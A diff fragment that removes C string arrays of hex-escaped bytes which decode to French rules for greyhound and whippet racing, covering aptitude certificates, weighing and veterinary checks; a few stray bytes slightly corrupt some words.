-"\x2e\x0d\x44\x61\x6e\x73\x20\x63\x65\x72\x74\x61\x69\x6e\x73\x20"
-"\x63\x61\x73\x2c\x20\x6f\x6e\x20\x70\x65\x75\x74\x20\x61\x63\x63"
-"\x65\x70\x74\x65\x72\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72"
-"\x20\x62\x69\x65\x6e\x20\x71\x75\x65\x20\x6c\x65\x20\x20\x70\x65"
-"\x64\x69\x67\x72\x65\x65\x20\x6e\x65\x20\x73\x6f\x69\x74\x20\x70"
-"\xa3\x73\x20\x61\x72\x72\x69\x76\xe9\x2c\x20\x6d\x61\x69\x73\x20"
-"\x6c\x65\x73\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x6e\x65"
-"\x20\x73\x65\x72\x6f\x6e\x74\x20\x70\x61\x73\x20\x64\xe9\x6c\x69"
-"\x76\x72\xe9\x73\x20\x61\x76\x61\x6e\x74\x20\x72\xe9\x63\x65\x70"
-"\x74\x69\x6f\x6e\x20\x64\x75\x20\x70\x65\x64\x69\x67\x72\x65\x65"
-"\x2e\x20\x4c\x65\x73\x20\x42\x41\x43\x20\x6e\x65\x20\x70\x65\x75"
-"\x76\x65\x6e\x74\x20\x70\x61\x73\x20\xea\x74\x72\x65\x20\x70\x61"
-"\x73\x73\xe9\x73\x20\x75\x6e\x20\x6a\x6f\x75\x72\x20\x64\x65\x20"
-"\x63\x6f\x75\x72\x73\x65\x2c\x20\x73\x61\x75\x66\x20\x65\x78\x63"
-"\x65\x70\x74\x69\x6f\x6e\x73\x20\x70\x72\xe9\x76\x75\x65\x73\x20"
-"\x61\x75\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x2e\x0d\x0d\x32"
-"\x29\x20\x4c\x27\x65\x78\x70\x65\x72\x74\x2d\x71\x75\x61\x6c\x69"
-"\x66\x69\x63\x61\x74\x65\x75\x72\x20\x28\x45\x51\x29\x20\x63\x6f"
-"\x6e\x74\x72\xf4\x6c\x65\x20\x6c\x65\x73\x20\x70\x61\x70\x69\x65"
-"\x72\x73\x2c\x20\x6c\x65\x20\x74\x61\x74\x6f\x75\x61\x67\x65\x2e"
-"\x0d\x50\x6f\x75\x72\x20\x6c\x65\x73\x20\x57\x68\x69\x70\x70\x65"
-"\x74\x73\x2c\x20\x69\x6c\x20\x70\xe8\x73\x65\x20\x6c\x65\x20\x63"
-"\x68\x69\x65\x6e\x2c\x20\x70\x75\x69\x73\x20\x70\x72\x65\x6e\x64"
-"\x20\x39\x20\x74\x6f\x69\x73\x65\x73\x20\x61\x75\x20\x67\x61\x72"
-"\x72\x6f\x74\x20\x70\x6f\x75\x72\x20\x72\x65\x74\x65\x6e\x69\x72"
-"\x20\x63\x65\x6c\x6c\x65\x20\x64\x75\x20\x6d\x69\x6c\x69\x65\x75"
-"\x2c\x20\x6c\x61\x20\x6d\xe9\x64\x69\x61\x6e\x65\x2e\x20\x49\x6c"
-"\x20\x70\x65\x75\x74\x20\x61\x75\x73\x73\x69\x20\x66\x61\x69\x72"
-"\x65\x20\x70\x61\x73\x73\x65\x72\x20\x6c\x65\x20\x57\x68\x69\x70"
-"\x70\x65\x74\x20\x73\x6f\x75\x73\x20\x75\x6e\x20\x67\x61\x62\x61"
-"\x72\x69\x74\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x2e\x0d\x54\x61"
-"\x69\x6c\x6c\x65\x20\x26\x20\x70\x6f\x69\x64\x73\x20\x64\xe9\x74"
-"\x65\x72\x6d\x69\x6e\x65\x6e\x74\x20\x6c\x61\x20\x63\x61\x74\xe9"
-"\x67\x6f\x72\x69\x65\x20\x64\x65\x20\x66\x6f\x72\x6d\x61\x74\x20"
-"\x28\x70\x65\x74\x69\x74\x73\x20\x6f\x75\x20\x57\x2c\x20\x20\x67"
-"\x72\x61\x6e\x64\x73\x20\x20\x6f\x75\x20\x47\x57\x2c\x20\x74\x72"
-"\xe8\x73\x20\x67\x72\x61\x6e\x64\x73\x20\x6f\x75\x20\x54\x47\x57"
-"\x29\x2e\x20\x4c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x75"
-"\x6c\x74\xe9\x72\x69\x65\x75\x72\x65\x73\x20\x72\x61\x73\x73\x65"
-"\x6d\x62\x6c\x65\x72\x6f\x6e\x74\x20\x64\x65\x73\x20\x63\x6f\x6e"
-"\x63\x75\x72\x72\x65\x6e\x74\x73\x20\x64\x65\x20\x6d\xea\x6d\x65"
-"\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x20\x64\x61\x6e\x73\x20"
-"\x63\x68\x61\x71\x75\x65\x20\x73\x65\x78\x65\x2e\x20\x41\x70\x72"
-"\xe8\x73\x20\x6c\x27\xe2\x67\x65\x20\x64\x65\x20\x32\x20\x61\x6e"
-"\x73\x2c\x20\x75\x6e\x20\x64\x65\x75\x78\x69\xe8\x6d\x65\x20\x63"
-"\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x73\x65\x72\x61\x20\x6f\x62\x6c"
-"\x69\x67\x61\x74\x6f\x69\x72\x65\x2e\x20\x45\x6e\x20\x65\x66\x66"
-"\x65\x74\x20\x6c\x65\x20\x6d\x65\x73\x75\x72\x61\x67\x65\x20\x64"
-"\x65\x20\x6c\x61\x20\x74\x61\x69\x6c\x6c\x65\x20\x65\x73\x74\x20"
-"\x64\xe9\x6c\x69\x63\x61\x74\x20\x65\x6e\x20\x66\x6f\x6e\x63\x74"
-"\x69\x6f\x6e\x20\x64\x65\x20\x6c\x61\x20\x70\x6f\x73\x69\x74\x69"
-"\x6f\x6e\x20\x64\x75\x20\x63\x68\x69\x65\x6e\x2e\x20\x49\x6c\x20"
-"\x79\x20\x61\x20\x66\x72\xe9\x71\x75\x65\x6d\x6d\x65\x6e\x74\x20"
-"\x75\x6e\x20\xe9\x63\x61\x72\x74\x20\x64\x27\x65\x6e\x76\x69\x72"
-"\x6f\x6e\x20\x31\x20\x63\x6d\x20\x65\x6e\x74\x72\x65\x20\x6c\x61"
-"\x20\x6d\xe9\x64\x69\x61\x6e\x65\x20\x65\x74\x20\x6c\x65\x73\x20"
-"\x6d\x65\x73\x75\x72\x65\x73\x20\x65\x78\x74\x72\xea\x6d\x65\x73"
-"\x2e\x20\x41\x76\x61\x6e\x74\x20\x63\x68\x61\x71\x75\x65\x20\x63"
-"\x6f\x75\x72\x73\x65\x2c\x20\x6c\x65\x20\x6a\x75\x67\x65\x20\x70"
-"\x85\x75\x74\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x72\x20\x6c\x65"
-"\x20\x66\x6f\x72\x6d\x61\x74\x20\x65\x74\x20\x63\x68\x61\x6e\x67"
-"\x65\x72\x20\x6c\x61\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x2c"
-"\x20\x73\x61\x75\x66\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x63\x68"
-"\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x6f\xf9\x20\x69\x6c\x20"
-"\x66\x61\x69\x74\x20\x75\x6e\x20\x72\x61\x70\x70\x6f\x72\x74\x2e"
-"\x0d\x4c\x65\x73\x20\x50\x65\x74\x69\x74\x73\x20\x4c\xe9\x76\x72"
-"\x69\x65\x72\x73\x20\x49\x74\x61\x6c\x69\x65\x6e\x73\x20\x64\x6f"
-"\x69\x76\x65\x6e\x74\x20\x61\x75\x73\x73\x69\x20\x73\x75\x62\x69"
-"\x72\x20\x6f\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65\x6d\x65\x6e"
-"\x74\x20\x6c\x65\x73\x20\x39\x20\x74\x6f\x69\x73\x65\x73\x20\x65"
-"\x74\x20\x6c\x65\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x64\x65"
-"\x73\x20\x32\x20\x61\x6e\x73\x2e\x0d\x41\x75\x63\x75\x6e\x20\x6c"
-"\xe9\x76\x72\x69\x65\x72\x20\x6e\x92\x65\x73\x74\x20\x61\x75\x74"
-"\x6f\x72\x69\x73\xe9\x20\xe0\x20\x63\x6f\x6e\x63\x6f\x75\x72\x69"
-"\x72\x20\x65\x6e\x20\xe9\x70\x72\x65\x75\x76\x65\x20\x6f\x66\x66"
-"\x69\x63\x69\x65\x6c\x6c\x65\x20\x73\x92\x69\x6c\x20\x64\xe9\x70"
-"\x61\x73\x73\x65\x20\x6c\x65\x73\x20\x6e\x6f\x72\x6d\x65\x73\x20"
-"\x64\x65\x20\x74\x61\x69\x6c\x6c\x65\x20\x6f\x75\x20\x64\x65\x20"
-"\x70\x6f\x69\x64\x73\x20\x69\x6d\x70\x6f\x73\xe9\x65\x73\x20\x70"
-"\x61\x72\x20\x6c\x65\x73\x20\x72\xe8\x12\x6c\x65\x6d\x65\x6e\x74"
-"\x73\x2e\x0d\x49\x6c\x20\x65\x78\x69\x73\x74\x65\x20\x64\x65\x73"
-"\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x73\x20\x64\x65\x20"
-"\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x61\x75\x78\x71\x75\x65\x6c"
-"\x6c\x65\x73\x20\x76\x6f\x75\x73\x20\x70\x6f\x75\x76\x65\x7a\x20"
-"\x64\xe9\x66\xe9\x72\x65\x72\x20\x76\x6f\x74\x72\x65\x20\x57\x68"
-"\x69\x70\x70\x65\x74\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\x50"
-"\x4c\x49\x2c\x20\x6f\x75\x20\x76\x6f\x75\x73\x20\x76\x6f\x69\x72"
-"\x20\x63\x6f\x6e\x76\x6f\x71\x75\xe9\x20\x63\x61\x72\x20\x69\x6c"
-"\x20\x65\x78\x69\x73\x74\x65\x20\x75\x6e\x65\x20\x72\x65\x6c\x61"
-"\x74\x69\x6f\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x65\x20\x65\x6e"
-"\x74\x72\x65\x20\x66\x6f\x72\x6d\x61\x74\x20\x65\x74\x20\x76\x69"
-"\x74\x65\x73\x73\x65\x2e\x20\x4f\x6e\x20\x6e\x65\x20\x66\x61\x69"
-"\x74\x20\x70\x61\x73\x20\x63\x6f\x6e\x63\x6f\x75\x72\x69\x72\x20"
-"\x64\x65\x73\x20\x70\x6f\x69\x64\x73\x20\x70\x6c\x75\x6d\x65\x73"
-"\x20\x63\x6f\x6e\x74\x72\x65\x20\x64\x65\x73\x20\x70\x6f\x69\x64"
-"\x73\x20\x6c\x6f\x75\x72\x64\x73\x2e\x20\x44\x65\x70\x75\x69\x73"
-"\x20\x6c\x61\x20\x6d\x69\x73\x65\x20\x65\x6e\x20\x70\x6c\x61\x63"
-"\x65\x20\x64\x75\x20\x73\x79\x73\x74\xe8\x6d\x65\x20\x74\x61\x69"
-"\x6c\x6c\x65\x2f\x70\x6f\x69\x64\x73\x20\x69\x6c\x20\x79\x20\x61"
-"\x20\x74\x72\xe8\x73\x20\x70\x65\x75\x20\x64\x65\x20\x63\x6f\x6e"
-"\x74\x65\x73\x74\x61\x74\x69\x6f\x6e\x73\x20\x61\x75\x20\x6e\x69"
-"\x76\x65\x61\x75\x20\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x2e\x20\x4c"
-"\x27\x61\x62\x73\x65\x6e\x63\x65\x20\x64\x65\x20\x63\x6f\x6e\x74"
-"\x72\xf4\x6c\x65\x73\x20\x69\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f"
-"\x6e\x61\x75\x78\x20\x73\x6f\x75\x6c\xe8\x76\x65\x20\x70\x61\x72"
-"\x20\x63\x6f\x6e\x74\x72\x65\x20\x62\x69\x65\x6e\x20\x64\x65\x73"
-"\x20\x70\x6f\x6c\xe9\x6d\x69\x71\x75\x65\x73\x2e\x0d\x54\x6f\x75"
-"\x73\x20\x63\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20"
-"\x73\x6f\x6e\x74\x20\x70\x6f\x72\x74\xe9\x73\x20\x73\x75\x72\x20"
-"\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x2e\x0d\x33\x29\x20\x4c\x65"
-"\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x64\x75\x20\x42\x41"
-"\x43\x20\x63\x6f\x6e\x73\x69\x73\x74\x65\x6e\x74\x20\x64\x27\x61"
-"\x62\x6f\x72\x64\x20\x65\x6e\x20\x75\x6e\x20\x73\x6f\x6c\x6f\x20"
-"\x70\x6f\x75\x72\x20\x76\xe9\x72\x69\x66\x69\x65\x72\x20\x6c\x27"
-"\x61\x70\x74\x69\x74\x75\x64\x65\x20\xe0\x20\x73\x75\x69\x76\x72"
-"\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x61\x76\x65\x63"
-"\x20\x61\x72\x64\x65\x75\x72\x2e\x20\x43\x65\x6c\x61\x20\x73\x75"
-"\x66\x66\x69\x74\x20\x70\x6f\x75\x72\x20\x63\x65\x72\x74\x61\x69"
-"\x6e\x65\x73\x20\x72\x61\x63\x65\x73\x20\xe0\x20\x66\x61\x69\x62"
-"\x6c\x65\x20\x65\x66\x66\x65\x63\x74\x69\x66\x2e\x20\x4c\x65\x73"
-"\x20\x57\x68\x69\x70\x70\x65\x74\x73\x20\x64\x6f\x69\x76\x65\x6e"
-"\x74\x20\x66\x61\x69\x72\x65\x2c\x20\x65\x6e\x20\x6f\x75\x74\x72"
-"\x65\x2c\x20\x32\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x65\x6e\x20"
-"\x67\x72\x6f\x75\x70\x65\x2e\x20\x49\x6c\x20\x65\x73\x74\x20\x73"
-"\x6f\x75\x68\x61\x69\x74\x61\x62\x6c\x65\x20\x71\x75\x65\x20\x6c"
-"\x65\x73\x20\x61\x63\x63\x6f\x6d\x70\x61\x67\x6e\x61\x74\x65\x75"
-"\x72\x73\x20\x63\x6f\x6d\x70\x72\x65\x6e\x6e\x65\x6e\x74\x20\x64"
-"\x65\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x64\x65\x20\x76"
-"\x69\x74\x65\x73\x73\x65\x73\x20\x64\x69\x66\x66\xe9\x72\x65\x6e"
-"\x74\x65\x73\x20\x70\x6f\x75\x72\x20\x65\x6e\x63\x61\x64\x72\x65"
-"\x72\x20\x6c\x65\x20\x6e\xe9\x6f\x70\x68\x79\x74\x65\x2e\x20\x41"
-"\x20\x63\x68\x61\x71\x75\x65\x20\x76\x69\x72\x61\x67\x65\x20\x69"
-"\x6c\x20\x79\x20\x61\x20\x75\x6e\x20\x22\x6f\x62\x73\x65\x72\x76"
-"\x61\x74\x65\x75\x72\x22\x2c\x20\x6d\x75\x6e\x69\x20\x64\x27\x75"
-"\x6e\x65\x20\x63\x61\x72\x74\x65\x20\x61\x63\x63\x72\xe9\x64\x69"
-"\x74\x69\x76\x65\x20\x64\x65\x20\x63\x6f\x6d\x70\xe9\x74\x65\x6e"
-"\x63\x65\x2c\x20\x71\x75\x69\x2c\x20\x65\x6e\x20\x63\x61\x73\x20"
-"\x64\x27\x69\x6e\x63\x69\x64\x65\x6e\x74\x20\x69\x6e\x66\x6f\x72"
-"\x6d\x65\x20\x6c\x27\x65\x78\x70\x65\x72\x74\x2e\x0d\x53\x69\x20"
-"\x74\x6f\x75\x74\x20\x73\x27\x65\x73\x74\x20\x62\x69\x65\x6e\x20"
-"\x70\x61\x73\x73\xe9\x2c\x20\x76\x6f\x74\x72\x65\x20\x4c\xe9\x76"
-"\x72\x69\x65\x72\x20\xd1\x62\x74\x69\x65\x6e\x74\x20\x73\x6f\x6e"
-"\x20\x42\x41\x43\x2e\x20\x53\x27\x69\x6c\x20\x79\x20\x61\x20\x75"
-"\x6e\x20\x64\x6f\x75\x74\x65\x2c\x20\x69\x6c\x20\x65\x73\x74\x20"
-"\x61\x6a\x6f\x75\x72\x6e\xe9\x2c\x20\x73\x27\x69\x6c\x20\x79\x20"
-"\x61\x20\x66\x61\x75\x74\x65\x20\x69\x6c\x20\x65\x73\x74\x20\x72"
-"\x65\x66\x75\x73\xe9\x20\x65\x74\x20\x64\x65\x76\x72\x61\x20\x61"
-"\x74\x74\x65\x6e\x64\x72\x65\x20\x31\x20\x6d\x6f\x69\x73\x20\x70"
-"\x6f\x75\x72\x20\x73\x65\x20\x72\x65\x70\x72\xe9\x73\x65\x6e\x74"
-"\x65\x72\x2e\x20\x56\x6f\x75\x73\x20\x64\x65\x76\x72\x65\x7a\x20"
-"\x61\x6c\x6f\x72\x73\x20\x61\x6d\xe9\x6c\x69\x6f\x72\x65\x72\x20"
-"\x73\x6f\x6e\x20\x64\x72\x65\x73\x73\x61\x67\x65\x2e\x0d\x4c\x65"
-"\x20\x63\x6c\x75\x62\x20\x76\x6f\x75\x73\x20\x72\x65\x6d\x65\x74"
-"\x20\x61\x6c\x6f\x72\x73\x20\x75\x6e\x20\x42\x41\x43\x20\x64\x6f"
-"\x6e\x74\x20\x76\x6f\x75\x73\x20\x63\x6f\x6e\x73\x65\x72\x76\x65"
-"\x72\x65\x7a\x20\x70\x72\xe9\x63\x69\x65\x75\x73\x65\x6d\x65\x6e"
-"\x74\x20\x6c\x27\x6f\x72\x69\x67\x69\x6e\x61\x6c\x2e\x20\x49\x6c"
-"\x20\x65\x73\x74\x20\x69\x6e\x73\x63\x72\x69\x74\x20\x73\x75\x72"
-"\x20\x6c\x65\x73\x20\x6e\x6f\x75\x76\x65\x61\x75\x78\x20\x63\x61"
-"\x72\x6e\x65\x74\x73\x2e\x0d\x4c\x65\x20\x63\x6c\x75\x62\x20\x76"
-"\x6f\x75\x73\x20\x72\x65\x6d\x65\x74\x20\xe9\x67\x61\x6c\x65\x6d"
-"\x65\x6e\x74\x20\x75\x6e\x20\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f"
-"\x6c\x6f\x72\xe9\x20\x71\x75\x69\x20\x65\x73\x74\x20\x6c\x61\x20"
-"\x70\x72\x65\x75\x76\x65\x20\x64\x65\x20\x6c\x61\x20\x63\x61\x70"
-"\x61\x63\x69\x74\xe9\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20"
-"\x64\x75\x20\x4c\xe9\x76\x72\x69\x65\x72\x2e\x0d\x50\x61\x72\x20"
-"\x6c\x61\x20\x73\x75\x69\x74\x65\x2c\x20\x76\x6f\x74\x72\x65\x20"
-"\x4c\xe9\x76\x72\x69\x65\x72\x20\x70\x65\x75\x74\x20\x61\x62\x61"
-"\x6e\x64\x6f\x6e\x6e\x65\x72\x20\x65\x6e\x20\xe9\x70\x72\x65\x75"
-"\x76\x65\x2c\x20\x6f\x75\x20\x66\x6c\x6f\x74\x74\x65\x72\x20\x65"
-"\x6e\x20\x63\x6f\x75\x72\x73\x65\x2e\x20\x4f\x6e\x20\x64\x69\x74"
-"\x20\x71\x75\x27\x69\x6c\x20\x6d\x61\x6e\x71\x75\x65\x20\x64\x27"
-"\xe9\x63\x6f\x6c\x61\x67\x65\x2c\x20\x69\x6c\x20\x6e\x27\x65\x73"
-"\x74\x20\x70\x61\x73\x20\x61\x73\x73\x65\x7a\x20\x68\x61\x62\x69"
-"\x74\x75\xe9\x20\xe0\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20"
-"\x65\x6e\x20\x67\x72\x6f\x75\x70\x65\x2e\x20\x4f\x6e\x20\x69\x6e"
-"\x73\x63\x72\x69\x74\x20\x53\x55\x53\x50\x20\x73\x75\x72\x20\x73"
-"\x6f\x6e\x20\x63\x61\x72\x6e\x65\x74\x2e\x0d\x53\x69\x20\x70\x61"
-"\x72\x20\x63\x6f\x6e\x74\x72\x65\x20\x69\x6c\x20\x61\x20\x75\x6e"
-"\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\x67\xea"
-"\x6e\x61\x6e\x74\x20\x70\x6f\x75\x72\x20\x6c\x65\x73\x20\x61\x75"
-"\x74\x72\x65\x73\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73"
-"\x2c\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x64\x69\x73\x71\x75\x61"
-"\x6c\x69\x66\x69\xe9\x20\x65\x74\x20\x69\x6e\x74\x65\x72\x64\x69"
-"\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x20\x70\x65\x6e\x64"
-"\x61\x6e\x74\x20\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x34\x20\x73"
-"\x65\x6d\x61\x69\x6e\x65\x73\x2e\x20\x43\x65\x6c\x61\x20\x65\x73"
-"\x74\x20\x70\x6f\x72\x74\xe9\x20\x73\x75\x72\x20\x6c\x65\x20\x63"
-"\x61\x72\x6e\x65\x74\x20\x65\x74\x20\x73\x75\x72\x20\x6c\x65\x20"
-"\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f\x6c\x6f\x72\xe9\x2e\x20\x0d"
-"\x0d\x44\x6f\x6e\x63\x2c\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72"
-"\x69\x72\x20\x69\x6c\x20\x66\x61\x75\x74\x20\x33\x20\x64\x6f\x63"
-"\x75\x6d\x65\x6e\x74\x73\x20\x3a\x0d\x20\x43\x41\x52\x4e\x45\x54"
-"\x20\x2b\x20\x42\x41\x43\x20\x2b\x20\x43\x41\x52\x54\x4f\x4e\x20"
-"\x43\x4f\x4c\x4f\x52\x45\x0d\x0d\x4c\x65\x20\x70\x61\x73\x73\x61"
-"\x67\x65\x20\x64\x75\x20\x42\x50\x56\x20\x3a\x0d\x4c\x65\x20\x63"
-"\x61\x72\x6e\x65\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c"
-"\x20\x65\x73\x74\x20\x64\xe0\x66\x66\xe9\x72\x65\x6e\x74\x20\x28"
-"\x76\x65\x72\x74\x29\x20\x65\x74\x20\x6c\x65\x73\x20\x6d\x6f\x64"
-"\x61\x6c\x69\x74\xe9\x73\x20\x64\x65\x20\x71\x75\x61\x6c\x69\x66"
-"\x69\x63\x61\x74\x69\x6f\x6e\x20\x73\x6f\x6e\x74\x20\x61\x6e\x61"
-"\x6c\x6f\x67\x75\x65\x73\x2c\x20\x6d\x61\x69\x73\x20\x65\x6e\x20"
-"\x73\x6f\x6c\x6f\x20\x65\x74\x20\x65\x6e\x20\x63\x6f\x75\x70\x6c"
-"\x65\x2e\x0d\x56\x6f\x75\x73\x20\xea\x74\x65\x73\x20\x64\xe9\x73"
-"\x6f\x72\x6d\x61\x69\x73\x20\x70\x72\xea\x74\x20\x70\x6f\x75\x72"
-"\x20\x6c\x61\x20\x63\x6f\x6d\x70\xe9\x74\x69\x74\x69\x6f\x6e\x2e"
-"\x0d\x0d\x51\x75\x65\x20\x64\x65\x76\x65\x7a\x2d\x76\x6f\x75\x73"
-"\x20\x73\x61\x76\x6f\x69\x72\x20\x3f\x0d\x54\x6f\x75\x74\x65\x73"
-"\x20\x6c\x65\x73\x20\xe9\x76\x65\x6e\x74\x75\x61\x6c\x69\x74\xe9"
-"\x73\x20\x73\x6f\x6e\x74\x20\x64\xe9\x63\x72\x69\x74\x65\x73\x20"
-"\x65\x6e\x20\x64\xe9\x74\x61\x69\x6c\x20\x64\x61\x6e\x73\x20\x6c"
-"\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x20\x64\x65\x73\x20"
-"\xe9\x70\x72\x65\x75\x76\x65\x73\x2c\x20\x71\x75\x69\x20\x63\x6f"
-"\x6d\x70\x72\x65\x6e\x64\x20\x6c\x65\x73\x20\x72\xe8\x67\x6c\x65"
-"\x73\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x69\x76\x65"
-"\x73\x2c\x20\x70\x75\x69\x73\x20\x75\x6e\x20\x72\xe8\x67\x6c\x65"
-"\x6d\x65\x6e\x74\x20\x70\x6f\x75\x72\x20\x45\x2e\x4e\x2e\x43\x2e"
-"\x2c\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x69"
-"\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x2c\x20"
-"\x20\x70\x6f\x75\x72\x20\x45\x2e\x50\x2e\x56\x2e\x4c\x2e\x2e\x0d"
-"\x4c\x65\x20\x74\x6f\x75\x74\x20\x66\x61\x69\x74\x20\x65\x6e\x76"
-"\x69\x72\x6f\x6e\x20\x35\x30\x20\x70\x61\x67\x65\x73\x20\x65\x74"
-"\x20\x6e\x65\x20\x70\x65\x75\x74\x20\x64\x6f\x6e\x63\x20\xea\x74"
-"\x72\x65\x20\x64\x69\x66\x66\x75\x73\xe9\x20\xe0\x20\x63\x68\x61"
-"\x63\x75\x6e\x2e\x0d\x56\x6f\x75\x73\x20\x64\x65\x76\x65\x7a\x20"
-"\x64\x27\x61\x62\x6f\x72\x64\x20\x65\x6e\x67\x61\x67\x65\x72\x20"
-"\x3a\x0d\x41\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x6f"
-"\x75\x20\x61\x75\x20\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20"
-"\x64\x75\x20\x63\x6c\x75\x62\x20\x20\x6f\x72\x67\x61\x6e\x69\x73"
-"\x61\x74\x65\x75\x72\x2c\x20\x76\x6f\x75\x73\x20\x65\x6e\x76\x6f"
-"\x79\x65\x7a\x20\x31\x35\x20\x6a\x6f\x75\x72\x73\x20\xe0\x20\x6c"
-"\x27\x61\x76\x61\x6e\x63\x65\x20\x76\x6f\x74\x72\x65\x20\x65\x6e"
-"\x67\x61\x67\x65\x6d\x65\x6e\x74\x20\x73\x75\x72\x20\x75\x6e\x20"
-"\x6d\x6f\x64\xe8\x6c\x65\x20\x74\x79\x70\x65\x2c\x20\x6f\x75\x2c"
-"\x20\xe0\x20\x64\xe9\x66\x61\x75\x74\x20\x73\x75\x72\x20\x70\x61"
-"\x70\x69\x65\x72\x20\x6c\x69\x62\x72\x65\x20\x65\x6e\x20\x72\x65"
-"\x63\x6f\x70\x69\x61\x6e\x74\x20\x6c\x65\x20\x42\x41\x43\x2e\x0d"
-"\x4c\x65\x73\x20\x74\x61\x72\x69\x66\x73\x20\x73\x6f\x6e\x74\x20"
-"\x66\x69\x78\xe9\x73\x20\x70\x61\x72\x20\x6c\x61\x20\x53\x2e\x43"
-"\x2e\x43\x2e\x0d\x56\x6f\x75\x73\x20\x64\x65\x76\x65\x7a\x20\x76"
-"\x6f\x75\x73\x20\x70\x72\xe9\x73\x65\x6e\x74\x65\x72\x20\xe0\x20"
-"\x6c\x27\x68\x65\x75\x72\x65\x20\x6f\x69\x78\xe9\x65\x20\x28\x65"
-"\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x39\x68\x29\x20\x70\x6f"
-"\x75\x72\x20\x6c\x65\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x76"
-"\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x2c\x20\x6d\x75\x6e\x69"
-"\x20\x64\x27\x75\x6e\x20\x63\x65\x72\x74\x69\x66\x69\x63\x61\x74"
-"\x20\x64\x65\x20\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x20"
-"\x61\x6e\x74\x69\x72\x61\x62\x69\x71\x75\x65\x20\x76\x61\x6c\x69"
-"\x64\x65\x2e\x20\x41\x20\x64\xe9\x66\x61\x75\x74\x2c\x20\x76\x6f"
-"\x75\x73\x20\x6e\x65\x20\x70\x6f\x75\x72\x72\x65\x7a\x20\x70\x61"
-"\x73\x20\x70\x72\x65\x6e\x64\x72\x65\x20\x6c\x65\x20\x64\xe9\x70"
-"\x61\x72\x74\x2e\x0d\x4c\x65\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61"
-"\x69\x72\x65\x20\x76\xe9\x72\x69\x66\x69\x65\x20\x6c\x65\x73\x20"
-"\x70\x61\x70\x69\x65\x72\x73\x2c\x20\x69\x6c\x20\x63\x6f\x6e\x74"
-"\x72\xf4\x6c\x65\x20\x6c\x65\x73\x20\x63\x68\x61\x6c\x65\x75\x72"
-"\x73\x20\x64\x65\x73\x20\x66\x65\x6d\x65\x6c\x6c\x65\x73\x2e\x0d"
-"\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74\x20"
-"\x64\x27\x61\x6d\x65\x6e\x65\x72\x20\x75\x6e\x65\x20\x66\x65\x6d"
-"\x65\x6c\x6c\x65\x20\x65\x6e\x20\x63\x68\x61\x6c\x65\x75\x72\x20"
-"\x73\x75\x72\x20\x75\x6e\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65"
-"\x2c\x20\x63\x61\x72\x20\x63\x65\x6c\x61\x20\x76\x61\x20\xe9\x6e"
-"\x65\x72\x76\x65\x72\x20\x6c\x65\x73\x20\x63\x6f\x6e\x63\x75\x72"
-"\x72\x65\x6e\x74\x73\x20\x65\x74\x20\x70\x65\x75\x74\x20\x63\x6f"
-"\x6e\x64\x75\x69\x72\x65\x20\xe0\x20\x64\x65\x73\x20\x64\x69\x73"
-"\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x73\x2e\x0d"
-"\x4c\x65\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x20\x63"
-;
-char file_part1[]=
-"\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x6c\x27\xe9\x74\x61\x74\x20\x64"
-"\x65\x20\x73\x61\x6e\x74\xe9\x20\x65\x74\x20\x6e\x6f\x74\x61\x6d"
-"\x6d\x65\x6e\x74\x20\x63\x65\x6c\x75\x69\x20\x64\x65\x73\x20\x64"
